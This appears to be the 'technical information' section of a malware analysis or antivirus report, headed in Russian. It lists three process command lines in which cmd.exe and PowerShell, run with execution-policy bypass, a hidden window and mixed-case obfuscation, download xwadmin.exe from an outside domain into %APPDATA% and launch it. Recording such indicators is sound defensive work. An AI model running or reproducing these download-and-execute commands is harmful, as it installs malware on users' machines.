Техническая информация
- '<SYSTEM32>\cmd.exe' /c pOWERShELl -eX BYpaSS -NOP -w hiDdeN inVOKE-WeBREquest -URi 'https://onrywa.net/xwadmin.exe' -OutFile '%APpData%\xwxvb...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eX BYpaSS -NOP -w hiDdeN inVOKE-WeBREquest -URi 'https://onrywa.net/xwadmin.exe' -OutFile '%APPDATA%\xwxvbx.exe' ; InVOkE-itEM ...
- '<SYSTEM32>\cmd.exe' /c pOWERShELl -eX BYpaSS -NOP -w hiDdeN inVOKE-WeBREquest -URi 'https://onrywa.net/xwadmin.exe' -OutFile '%APpData%\xwxvb... (со скрытым окном)